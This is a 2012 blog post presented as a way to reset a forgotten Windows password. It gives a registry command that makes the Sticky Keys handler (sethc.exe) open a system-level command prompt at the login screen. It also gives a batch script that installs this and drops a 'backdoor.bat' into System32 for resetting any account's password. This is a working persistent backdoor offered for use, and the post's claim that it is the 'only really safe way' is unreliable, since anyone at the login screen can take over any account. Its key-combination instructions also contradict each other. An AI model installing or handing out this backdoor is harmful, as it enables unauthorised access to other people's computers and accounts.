Wednesday, June 13, 2012

Creating backdoor at Windows login to reset password after losing it.

Over the years I have had many people ask me how to get into their computer after they have forgotten their password. There are a few ways to do this either with a bootable cd or usb stick with a 3rd party application, but to be honest this is very unsafe as anyone can get the cd and break into a computer and at the same time you or anyone else that uses such software can cause users or admins to lose data.

The only really safe way to do it is through your command prompt, but without knowing your password to get into the profile to use the console then you are screwed. Recently I have discovered a way to be able to access your command prompt from the Windows login screen by adding a value to the registry. Now you can create a registry file (.reg) to do this, but today we will just add it via the command prompt:

1. You must open your cmd (command prompt) as administrator so you can't open it from run. You must go to your start screen type "cmd" in the search bar and when you see it right click on it and select "Run as administrator".

2. Type the code below into the prompt:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
Triple click on the above code to select all then copy and paste into your command prompt and hit "ENTER".

You now have access to the the command prompt at the Wcndows login screen.

Gain access by either:

  • Pressing SHIFT+ALT+PRTSC (Print Screen) or;
  • Hitting the SHIFT key 5 times in a row.

If you or anyone else on your Windows OS ever loses their password (or you just want to do anything else that you can do from the prompt) you can do it without logging in (be careful though!).

3. When you need to change your password from the prompt, type:
net user username password
Where username is, of course, your username and password your new password.

net user bob apples
Would change user bob's password to apples etc...

If your name has a space in it you must wrap quotation marks around the name as a space denotes a new command. You must enter it like:

net user "bob for" apples

4. Login with your new password!

I have created a batch file to automate this process so you don't have to do half of this. You can either download it Here or if you are scared of downloading files you can just copy and paste the text below into a batch you create.

  • Right click on your desktop and select New>TXT File.
  • Rename the file from "New Text Document.txt" to "whateveryouwant.bat" (if you can't see the extension just go into folder options and uncheck "Hide extensions of known applications" or something like that.
  • Once it's a bat file right click on it and select "Edit". and paste the code below into it and save the file
  • Right click on the bat file you have created and select "Run as administrator" and it will run.
Code to paste in your batch file:
@echo off
echo Creating backdoor console...
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
PING -n 1 -w 3000 > NUL
echo Creating backdoor batch file...
echo @echo off > C:/Windows/System32/backdoor.bat
echo title Creat New User Password >> C:/Windows/System32/backdoor.bat
echo echo Enter username to reset your password: >> C:/Windows/System32/backdoor.bat
echo set name= >> C:/Windows/System32/backdoor.bat
echo set pass= >> C:/Windows/System32/backdoor.bat
echo set /P name="Username:" >> C:/Windows/System32/backdoor.bat
echo set /P pass="New Password:" >> C:/Windows/System32/backdoor.bat
echo net user %%name%% %%pass%% >> C:/Windows/System32/backdoor.bat
echo PING -n 1 -w 3000 > NUL >> C:/Windows/System32/backdoor.bat
echo exit >> C:/Windows/System32/backdoor.bat
PING -n 1 -w 3000 > NUL
echo To run:
echo At the login screen either press
echo shift+ctrl+printscreen (or prtsc)
echo or hit shift 5 times. This will
echo bring up the command prompt. At
echo the prompt type "backdoor" to
echo the new password screen and follow
echo the instructions.
PING -n 1 -w 3000 > NUL

Once it starts it will enter the registry entries as provided above to create the access to the command prompt at Windows login and it will also create a batch file located in you System32 fold called "backdoor.bat" which will start you through an automated easy process to change your password, so no need to type the commands yourself just run the backdoor file. This batch files is run from your command prompt by typing "backdoor" or "backdoor.bat" and it

  • Run this batch file from the command prompt bay typing "backdoor" or "backdoor.bat" and hit "Enter".
  • It will easily guide you through the process of changing your password in just a couple of steps
Again, login and enjoy!!!